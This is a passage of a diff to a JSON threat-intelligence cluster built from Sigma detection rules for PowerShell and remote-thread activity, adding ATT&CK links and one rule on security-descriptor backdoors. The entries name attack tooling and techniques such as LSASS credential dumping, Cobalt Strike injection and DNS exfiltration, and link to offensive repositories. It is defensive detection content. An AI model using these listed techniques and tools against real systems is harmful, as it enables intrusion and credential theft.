"7e7c2fba-7cca-486c-9582-4c1bb2851961", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "29e1c216-6408-489d-8a06-ee9d151ef819", "value": "Suspicious Mount-DiskImage" }, @@ -21300,10 +26723,10 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://posts.specterops.io/entering-a-covenant-net-command-and-control-e11038bcf462", - "https://github.com/hlldz/Phant0m/blob/30c2935d8cf4aafda17ee2fab7cd0c4aa9a607c2/old/Invoke-Phant0m.ps1", "https://gist.github.com/MHaggis/0dbe00ad401daa7137c81c99c268cfb7", "https://github.com/PowerShellMafia/PowerSploit/blob/d943001a7defb5e0d1657085a77a0e78609be58f/CodeExecution/Invoke-ReflectivePEInjection.ps1", + "https://posts.specterops.io/entering-a-covenant-net-command-and-control-e11038bcf462", + "https://github.com/hlldz/Phant0m/blob/30c2935d8cf4aafda17ee2fab7cd0c4aa9a607c2/old/Invoke-Phant0m.ps1", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_keywords.yml" ], "tags": [ @@ -21311,6 +26734,15 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "1f49f2ab-26bc-48b3-96cc-dcffbc93eadf", "value": "Suspicious PowerShell Keywords" }, @@ -21335,6 +26767,15 @@ "attack.t1119" ] }, + "related": [ + { + "dest-uuid": "30208d3e-0d6b-43c8-883e-44462a514619", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "a9723fcc-881c-424c-8709-fd61442ab3c3", "value": "Recon Information for Export with PowerShell" }, @@ -21375,8 +26816,8 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/powershell/module/activedirectory/get-addefaultdomainpasswordpolicy", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1201/T1201.md#atomic-test-9---enumerate-active-directory-password-policy-with-get-addefaultdomainpasswordpolicy", + "https://docs.microsoft.com/en-us/powershell/module/activedirectory/get-addefaultdomainpasswordpolicy", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_get_addefaultdomainpasswordpolicy.yml" ], "tags": [ @@ -21384,6 +26825,15 @@ "attack.t1201" ] }, + "related": [ + { + "dest-uuid": "b6075259-dba3-44e9-87c7-e954f37ec0d5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "bbb9495b-58fc-4016-b9df-9a3a1b67ca82", "value": "Password Policy Discovery With Get-AdDefaultDomainPasswordPolicy" }, @@ -21400,8 +26850,8 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/Start-Process?view=powershell-5.1&viewFallbackFrom=powershell-7", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1036.003/T1036.003.md", + "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/Start-Process?view=powershell-5.1&viewFallbackFrom=powershell-7", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_start_process.yml" ], "tags": [ @@ -21409,6 +26859,15 @@ "attack.t1036.003" ] }, + "related": [ + { + "dest-uuid": "bd5b58a4-a52d-4a29-bc0d-3f1d3968eb6b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "0718cd72-f316-4aa2-988f-838ea8533277", "value": "Suspicious Start-Process PassThru" }, @@ -21433,6 +26892,15 @@ "attack.t1531" ] }, + "related": [ + { + "dest-uuid": "b24e2a20-3b3d-4bf0-823b-1ed765398fb0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "48a45d45-8112-416b-8a67-46e03a4b2107", "value": "Remove Account From Domain Admin Group" }, @@ -21457,6 +26925,15 @@ "attack.t1070.005" ] }, + "related": [ + { + "dest-uuid": "a750a9f6-0bde-4bb3-9aae-1e2786e9780c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "66a4d409-451b-4151-94f4-a55d559c49b0", "value": "PowerShell Deleted Mounted Share" }, @@ -21481,6 +26958,15 @@ "attack.t1090" ] }, + "related": [ + { + "dest-uuid": "731f4f55-b6d0-41d1-a7a9-072a66389aea", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "bd33d2aa-497e-4651-9893-5c5364646595", "value": "Suspicious TCP Tunnel Via PowerShell Script" }, @@ -21508,6 +26994,15 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "16b37b70-6fcf-4814-a092-c36bd3aafcbd", "value": "PowerShell ShellCode" }, @@ -21533,6 +27028,15 @@ "attack.t1552.004" ] }, + "related": [ + { + "dest-uuid": "60b508a1-6a5e-46b1-821a-9f7b78752abf", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "aa7a3fce-bef5-4311-9cc1-5f04bb8c308c", "value": "Suspicious Export-PfxCertificate" }, @@ -21557,6 +27061,15 @@ "attack.t1069.001" ] }, + "related": [ + { + "dest-uuid": "a01bf75f-00b2-4568-a58f-565ff9bf202b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "fa6a5a45-3ee2-4529-aa14-ee5edc9e29cb", "value": "Suspicious Get Local Groups Information - PowerShell" }, @@ -21581,6 +27094,15 @@ "attack.t1074.001" ] }, + "related": [ + { + "dest-uuid": "1c34f7aa-9341-4a48-bfab-af22e51aca6c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "b7a3c9a3-09ea-4934-8864-6a32cacd98d9", "value": "Zip A Folder With PowerShell For Staging In Temp - PowerShell Script" }, @@ -21598,8 +27120,8 @@ "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/windows/win32/projfs/enabling-windows-projected-file-system", - "https://docs.microsoft.com/en-us/powershell/module/dism/enable-windowsoptionalfeature?view=windowsserver2022-ps", "https://learn.microsoft.com/en-us/windows/wsl/install-on-server", + "https://docs.microsoft.com/en-us/powershell/module/dism/enable-windowsoptionalfeature?view=windowsserver2022-ps", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_enable_windowsoptionalfeature.yml" ], "tags": [ @@ -21622,10 +27144,10 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://www.virustotal.com/gui/file/720a7ee9f2178c70501d7e3f4bcc28a4f456e200486dbd401b25af6da3b4da62/content", + "https://www.virustotal.com/gui/file/d4486b63512755316625230e0c9c81655093be93876e0d80732e7eeaf7d83476/content", "https://learn.microsoft.com/en-us/dotnet/api/system.windows.input.keyboard.iskeydown?view=windowsdesktop-7.0", "https://twitter.com/ScumBots/status/1610626724257046529", - "https://www.virustotal.com/gui/file/d4486b63512755316625230e0c9c81655093be93876e0d80732e7eeaf7d83476/content", + "https://www.virustotal.com/gui/file/720a7ee9f2178c70501d7e3f4bcc28a4f456e200486dbd401b25af6da3b4da62/content", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_keylogger_activity.yml" ], "tags": [ @@ -21650,8 +27172,8 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1057/T1057.md#atomic-test-3---process-discovery---get-process", "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/get-process?view=powershell-7", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1057/T1057.md#atomic-test-3---process-discovery---get-process", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_get_process.yml" ], "tags": [ @@ -21683,6 +27205,15 @@ "attack.t1070.003" ] }, + "related": [ + { + "dest-uuid": "3aef9463-9a7a-43ba-8957-a867e07c1e6a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "26b692dc-1722-49b2-b496-a8258aa6371d", "value": "Clear PowerShell History - PowerShell" }, @@ -21707,6 +27238,15 @@ "attack.t1069.002" ] }, + "related": [ + { + "dest-uuid": "2aed01ad-3df3-4410-a8cb-11ea4ded587c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "8c3a6607-b7dc-4f0d-a646-ef38c00b76ee", "value": "Active Directory Group Enumeration With Get-AdGroup" }, @@ -21754,13 +27294,29 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "a19e86f8-1c0a-4fea-8407-23b73d615776", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "a6d67db4-6220-436d-8afc-f3842fe05d43", "value": "Dnscat Execution" }, { "description": "Detects Commandlet names from well-known PowerShell exploitation frameworks", "meta": { - "author": "Sean Metcalf (source), Florian Roth (rule), Bartlomiej Czyz @bczyz1 (update), oscd.community (update), Nasreddine Bencherchali (update), Tim Shelton (fp), Mustafa Kaan Demir (update), Georg Lauenstein (update), Max Altgelt (update), Tobias Michalski (update), Austin Songer (@austinsonger) (update)", + "author": "Sean Metcalf, Florian Roth, Bartlomiej Czyz @bczyz1, oscd.community, Nasreddine Bencherchali, Tim Shelton, Mustafa Kaan Demir, Georg Lauenstein, Max Altgelt, Tobias Michalski, Austin Songer", "creation_date": "2017/03/05", "falsepositive": [ "Unknown" @@ -21770,17 +27326,19 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware/", - "https://github.com/BloodHoundAD/BloodHound/blob/0927441f67161cc6dc08a53c63ceb8e333f55874/Collectors/AzureHound.ps1", - "https://github.com/xorrior/RandomPS-Scripts/blob/848c919bfce4e2d67b626cbcf4404341cfe3d3b6/Get-DXWebcamVideo.ps1", - "https://github.com/BC-SECURITY/Invoke-ZeroLogon/blob/111d17c7fec486d9bb23387e2e828b09a26075e4/Invoke-ZeroLogon.ps1", "https://github.com/dafthack/DomainPasswordSpray/blob/b13d64a5834694aa73fd2aea9911a83027c465a7/DomainPasswordSpray.ps1", - "https://github.com/S3cur3Th1sSh1t/PowerSharpPack/tree/master/PowerSharpBinaries", - "https://adsecurity.org/?p=2921", - "https://research.nccgroup.com/2022/06/06/shining-the-light-on-black-basta/", - "https://github.com/calebstewart/CVE-2021-1675", - "https://bloodhound.readthedocs.io/en/latest/data-collection/azurehound.html", "https://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/6f23bb41f9675d7e2d32bacccff75e931ae00554/OfficeMemScraper.ps1", + "https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware/", + "https://adsecurity.org/?p=2921", + "https://github.com/BC-SECURITY/Invoke-ZeroLogon/blob/111d17c7fec486d9bb23387e2e828b09a26075e4/Invoke-ZeroLogon.ps1", + "https://bloodhound.readthedocs.io/en/latest/data-collection/azurehound.html", + "https://github.com/calebstewart/CVE-2021-1675", + "https://github.com/HarmJ0y/DAMP", + "https://github.com/xorrior/RandomPS-Scripts/blob/848c919bfce4e2d67b626cbcf4404341cfe3d3b6/Get-DXWebcamVideo.ps1", + "https://research.nccgroup.com/2022/06/06/shining-the-light-on-black-basta/", + "https://github.com/S3cur3Th1sSh1t/PowerSharpPack/tree/master/PowerSharpBinaries", + "https://github.com/BloodHoundAD/BloodHound/blob/0927441f67161cc6dc08a53c63ceb8e333f55874/Collectors/AzureHound.ps1", + "https://github.com/samratashok/nishang", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_malicious_commandlets.yml" ], "tags": [ @@ -21796,6 +27354,43 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "767dbf9e-df3f-45cb-8998-4903ab5f80c0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "25659dd6-ea12-45c4-97e6-381e3e4b593e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "a01bf75f-00b2-4568-a58f-565ff9bf202b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "2aed01ad-3df3-4410-a8cb-11ea4ded587c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "89819aa4-bbd6-46bc-88ec-c7f7fe30efa6", "value": "Malicious PowerShell Commandlets - ScriptBlock" }, @@ -21822,6 +27417,15 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "e54f5149-6ba3-49cf-b153-070d24679126", "value": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - PowerShell" }, @@ -21838,9 +27442,9 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://community.sophos.com/sophos-labs/b/blog/posts/powershell-command-history-forensics", "https://stefanos.cloud/blog/kb/how-to-clear-the-powershell-command-history/", "https://www.shellhacks.com/clear-history-powershell/", + "https://community.sophos.com/sophos-labs/b/blog/posts/powershell-command-history-forensics", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_clearing_windows_console_history.yml" ], "tags": [ @@ -21849,6 +27453,15 @@ "attack.t1070.003" ] }, + "related": [ + { + "dest-uuid": "3aef9463-9a7a-43ba-8957-a867e07c1e6a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "bde47d4b-9987-405c-94c7-b080410e8ea7", "value": "Clearing Windows Console History" }, @@ -21873,6 +27486,15 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "6c6c6282-7671-4fe9-a0ce-a2dcebdc342b", "value": "Powershell XML Execute Command" }, @@ -21896,6 +27518,15 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "ae7fbf8e-f3cb-49fd-8db4-5f3bed522c71", "value": "Suspicious PowerShell Invocations - Specific" }, @@ -21922,6 +27553,22 @@ "attack.t1059" ] }, + "related": [ + { + "dest-uuid": "3d333250-30e4-4a82-9edc-756c68afc529", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "c1344fa2-323b-4d2e-9176-84b4d4821c88", "value": "Windows Defender Exclusions Added - PowerShell" }, @@ -21938,8 +27585,8 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=41", "https://learn.microsoft.com/en-us/dotnet/api/microsoft.hpc.scheduler.store.cx509enrollmentwebclassfactoryclass?view=hpc-sdk-5.1.6115", + "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=41", "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=42", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_x509enrollment.yml" ], @@ -21969,6 +27616,15 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "f772cee9-b7c2-4cb2-8f07-49870adc02e0", "value": "Malicious Nishang PowerShell Commandlets" }, @@ -21994,6 +27650,15 @@ "attack.t1546.015" ] }, + "related": [ + { + "dest-uuid": "bc0f5e80-91c0-4e04-9fbb-e4e332c85dae", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "8bc063d5-3a3a-4f01-a140-bc15e55e8437", "value": "Suspicious GetTypeFromCLSID ShellExecute" }, @@ -22019,6 +27684,22 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "8028c2c3-e25a-46e3-827f-bbb5abf181d7", "value": "WMImplant Hack Tool" }, @@ -22043,6 +27724,15 @@ "attack.t1574.012" ] }, + "related": [ + { + "dest-uuid": "ffeb0780-356e-4261-b036-cfb6bd234335", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "23590215-4702-4a70-8805-8dc9e58314a2", "value": "Registry-Free Process Scope COR_PROFILER" }, @@ -22068,6 +27758,15 @@ "attack.t1048" ] }, + "related": [ + { + "dest-uuid": "a19e86f8-1c0a-4fea-8407-23b73d615776", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "d59d7842-9a21-4bc6-ba98-64bfe0091355", "value": "Powershell DNSExfiltration" }, @@ -22094,9 +27793,43 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "e55a5195-4724-480e-a77e-3ebe64bd3759", "value": "Invoke-Obfuscation Via Use MSHTA - PowerShell" }, + { + "description": "Detects usage of certain functions and keywords that are used to manipulate security descriptors in order to potentially set a backdoor. As seen used in the DAMP project.", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2023/01/05", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_susp_ace_tampering.yml", + "level": "high", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/HarmJ0y/DAMP", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_ace_tampering.yml" + ], + "tags": [ + "attack.persistence", + "attack.defense_evasion", + "attack.privilege_escalation" + ] + }, + "uuid": "2f77047c-e6e9-4c11-b088-a3de399524cd", + "value": "Potential Persistence Via Security Descriptors - ScriptBlock" + }, { "description": "Adversaries may establish persistence and elevate privileges by executing malicious content triggered by a Windows Management Instrumentation (WMI) event subscription.", "meta": { @@ -22110,8 +27843,8 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/data/module_source/persistence/Persistence.psm1#L545", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.003/T1546.003.md", + "https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/data/module_source/persistence/Persistence.psm1#L545", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_wmi_persistence.yml" ], "tags": [ @@ -22119,6 +27852,15 @@ "attack.t1546.003" ] }, + "related": [ + { + "dest-uuid": "910906dd-8c0a-475a-9cc1-5e029e2fad58", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "9e07f6e7-83aa-45c6-998e-0af26efd0a85", "value": "Powershell WMI Persistence" }, @@ -22145,6 +27887,15 @@ "attack.t1020" ] }, + "related": [ + { + "dest-uuid": "774a3188-6ba9-4dc4-879d-d54ee48a5ce9", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "d2e3f2f6-7e09-4bf2-bc5d-90186809e7fb", "value": "Windows PowerShell Upload Web Request" }, @@ -22169,6 +27920,15 @@ "attack.t1137.006" ] }, + "related": [ + { + "dest-uuid": "34f1d81d-fe88-4f97-bd3b-a3164536255d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "36fbec91-fa1b-4d5d-8df1-8d8edcb632ad", "value": "Code Executed Via Office Add-in XLL File" }, @@ -22185,8 +27945,8 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1083/T1083.md", "https://www.mandiant.com/resources/tactics-techniques-procedures-associated-with-maze-ransomware-incidents", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1083/T1083.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_directory_enum.yml" ], "tags": [ @@ -22218,6 +27978,15 @@ "attack.t1217" ] }, + "related": [ + { + "dest-uuid": "5e4a2073-9643-44cb-a0b5-e7f4048446c7", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "e0565f5d-d420-4e02-8a68-ac00d864f9cf", "value": "Automated Collection Bookmarks Using Get-ChildItem PowerShell" }, @@ -22234,8 +28003,8 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://www.elastic.co/guide/en/security/current/volume-shadow-copy-deletion-via-powershell.html", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md#atomic-test-5---windows---delete-volume-shadow-copies-via-wmi-with-powershell", + "https://www.elastic.co/guide/en/security/current/volume-shadow-copy-deletion-via-powershell.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_win32_shadowcopy_deletion.yml" ], "tags": [ @@ -22243,6 +28012,15 @@ "attack.t1490" ] }, + "related": [ + { + "dest-uuid": "f5d8eed6-48a9-4cdf-a3d7-d1ffa99c3d2a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "c1337eb8-921a-4b59-855b-4ba188ddcc42", "value": "Deletion of Volume Shadow Copies via WMI with PowerShell - PS Script" }, @@ -22269,6 +28047,15 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "73e67340-0d25-11eb-adc1-0242ac120002", "value": "Invoke-Obfuscation CLIP+ Launcher - PowerShell" }, @@ -22293,6 +28080,15 @@ "attack.t1003.001" ] }, + "related": [ + { + "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "84c174ab-d3ef-481f-9c86-a50d0b8e3edb", "value": "PowerShell Get-Process LSASS in ScriptBlock" }, @@ -22317,6 +28113,15 @@ "attack.t1070.003" ] }, + "related": [ + { + "dest-uuid": "3aef9463-9a7a-43ba-8957-a867e07c1e6a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "70ad982f-67c8-40e0-a955-b920c2fa05cb", "value": "Suspicious IO.FileStream" }, @@ -22343,6 +28148,15 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "86b896ba-ffa1-4fea-83e3-ee28a4c915c7", "value": "Invoke-Obfuscation Via Stdin - Powershell" }, @@ -22392,6 +28206,15 @@ "attack.t1216" ] }, + "related": [ + { + "dest-uuid": "f6fe9070-7a65-49ea-ae72-76292f42cebe", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "6609c444-9670-4eab-9636-fe4755a851ce", "value": "Execution via CL_Mutexverifiers.ps1 (2 Lines)" }, @@ -22416,6 +28239,15 @@ "attack.t1006" ] }, + "related": [ + { + "dest-uuid": "0c8ab3eb-df48-4b9c-ace7-beacaac81cc5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "db809f10-56ce-4420-8c86-d6a7d793c79c", "value": "Raw Disk Access Using Illegitimate Tools" }, @@ -22432,8 +28264,8 @@ "logsource.category": "create_remote_thread", "logsource.product": "windows", "refs": [ - "https://blog.cobaltstrike.com/2018/04/09/cobalt-strike-3-11-the-snake-that-eats-its-tail/", "https://medium.com/@olafhartong/cobalt-strike-remote-threads-detection-206372d11d0f", + "https://blog.cobaltstrike.com/2018/04/09/cobalt-strike-3-11-the-snake-that-eats-its-tail/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_remote_thread/create_remote_thread_win_cobaltstrike_process_injection.yml" ], "tags": [ @@ -22441,6 +28273,15 @@ "attack.t1055.001" ] }, + "related": [ + { + "dest-uuid": "f4599aa0-4f85-4a32-80ea-fc39dc965945", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "6309645e-122d-4c5b-bb2b-22e4f9c2fa42", "value": "CobaltStrike Process Injection" }, @@ -22465,6 +28306,15 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "eeb2e3dc-c1f4-40dd-9bd5-149ee465ad50", "value": "Accessing WinAPI in PowerShell. Code Injection" }, @@ -22490,6 +28340,15 @@ "attack.t1003.001" ] }, + "related": [ + { + "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "f239b326-2f41-4d6b-9dfa-c846a60ef505", "value": "Password Dumper Remote Thread in LSASS" }, @@ -22516,6 +28375,22 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "045d0922-2310-4e60-b5e4-3302302cb3c5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "994cac2b-92c2-44bf-8853-14f6ca39fbda", "value": "Bumblebee Remote Thread Creation" }, @@ -22540,6 +28415,15 @@ "attack.t1003.001" ] }, + "related": [ + { + "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "fb656378-f909-47c1-8747-278bf09f4f4f", "value": "Potential Credential Dumping Attempt Via PowerShell Remote Thread" }, @@ -22565,6 +28449,15 @@ "attack.t1055.003" ] }, + "related": [ + { + "dest-uuid": "41d9846c-f6af-4302-a654-24bba2729bc6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "a1a144b7-5c9b-4853-a559-2172be8d4a03", "value": "Remote Thread Creation in Suspicious Targets" }, @@ -22581,9 +28474,9 @@ "logsource.category": "create_remote_thread", "logsource.product": "windows", "refs": [ - "https://github.com/denandz/KeeFarce", "https://github.com/GhostPack/KeeThief", "https://www.cisa.gov/uscert/ncas/alerts/aa20-259a", + "https://github.com/denandz/KeeFarce", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_remote_thread/create_remote_thread_win_password_dumper_keepass.yml" ], "tags": [ @@ -22591,6 +28484,15 @@ "attack.t1555.005" ] }, + "related": [ + { + "dest-uuid": "315f51f0-6b03-4c1e-bfb2-84740afb8e21", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "77564cc2-7382-438b-a7f6-395c2ae53b9a", "value": "KeePass Password Dumping" }, @@ -22607,8 